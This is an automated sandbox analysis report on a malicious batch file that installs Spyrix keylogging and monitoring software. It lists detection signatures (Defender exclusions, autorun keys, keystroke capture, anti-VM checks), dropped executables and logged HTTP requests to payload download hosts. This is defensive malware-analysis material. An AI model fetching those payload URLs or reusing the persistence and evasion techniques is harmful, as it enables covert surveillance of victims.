Windows Analysis Report
D0WmCTD2qO.bat

Overview

General Information

Sample name:	D0WmCTD2qO.bat renamed because original name is a hash value
Original sample name:	500329d1eeead6e6b7b1570f637138e91f0e28a4febeae208631db98750312ee.bat
Analysis ID:	1523869
MD5:	6777134e2627894ed689d8357973acc7
SHA1:	cd0fab81cecb98eb8b5c5530cf291e9c6e854453
SHA256:	500329d1eeead6e6b7b1570f637138e91f0e28a4febeae208631db98750312ee
Tags:	batfiledn-comuser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Adds a directory exclusion to Windows Defender

Creates an undocumented autostart registry key

Found API chain indicative of debugger detection

Found stalling execution ending in API Sleep call

Loading BitLocker PowerShell Module

PE file has nameless sections

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Uses cmd line tools excessively to alter registry or file data

Uses netstat to query active network connections and open ports

Uses regedit.exe to modify the Windows registry

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

HTTP GET or POST without a user agent

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries keyboard layouts

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: D0WmCTD2qO.bat	ReversingLabs: Detection: 26%
Source: D0WmCTD2qO.bat	Virustotal: Detection: 20%			Perma Link

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_0038C770 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	71_2_0038C770
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00389BC0 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	71_2_00389BC0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_2_00389D10 memcpy,memmove,memset,CertFreeCertificateContext,WSAGetLastError,strtol,strchr,strlen,strncpy,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strchr,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertFreeCertificateContext,strchr,strlen,CertOpenStore,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,GetLastError,CertFreeCertificateContext,	71_2_00389D10

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: -----BEGIN PUBLIC KEY-----		71_2_00388FA0
Source: qrl.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

HTML body contains low number of good links

Source: https://dashboard.spyrix.com/login

HTTP Parser: Number of links: 0

HTML body contains password input but no form action

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found but no <form action="...

HTML title does not match URL

Source: https://dashboard.spyrix.com/login

HTTP Parser: Title: Welcome Back does not match URL

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="author".. found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="copyright".. found

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49720 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49725 version: TLS 1.2

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0040AC68 FindFirstFileW,FindClose,	56_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	56_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033775E8 FindFirstFileA,	56_2_033775E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033776C4 FindFirstFileA,GetLastError,	56_2_033776C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, edx	71_2_0037B510
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp dword ptr [edi+04h], ebp	71_2_003748F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	71_2_003D5060
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push esi	71_2_003720F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then add eax, dword ptr [ecx+10h]	71_2_003DC0F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ecx, eax	71_2_003CF270
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00376370
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edi, dword ptr [ebx]	71_2_00377360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov byte ptr [edx], cl	71_2_003B5360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [ebx]	71_2_003833B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003774E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377641
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 0000000Ch	71_2_003836A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000019h	71_2_003836A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003776C1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377771
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_0037774F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003777DB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377828
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_0037785D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003778AB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [edi-04h]	71_2_003CE8A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377924
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377959
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_003779B7
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	71_2_003959E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [edi]	71_2_00365A00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377A5E
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377A9B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	71_2_00388AE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, ebp	71_2_0038DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	71_2_0038DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377BAC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377B8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	71_2_00388BD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp esi, edi	71_2_003B6C00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [esi]	71_2_003A3C90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edx, dword ptr [esp+74h]	71_2_0038BD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	71_2_00377D8F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebp, dword ptr [ebx+58h]	71_2_003CADE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [edi]	71_2_003B8EF0

Networking

Uses netstat to query active network connections and open ports

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s6 HTTP/1.1Host: filedn.comConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49720 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_003973D0 recv,send,WSAGetLastError,

71_2_003973D0

Source: global traffic	HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404 HTTP/1.1Host: filedn.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s6 HTTP/1.1Host: filedn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XYT5nbVGers4f7G&MD=VVPG9a78 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /loader/link.php?prg_id=sfk HTTP/1.1Host: cdnbaynet.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /download/sfk/sfk_setup.exe HTTP/1.1Host: swtb-download.spyrix-sfk.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XYT5nbVGers4f7G&MD=VVPG9a78 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-93c74fef.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal-86d79a8a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Regular-73dcaa51.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button-ca236c00.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
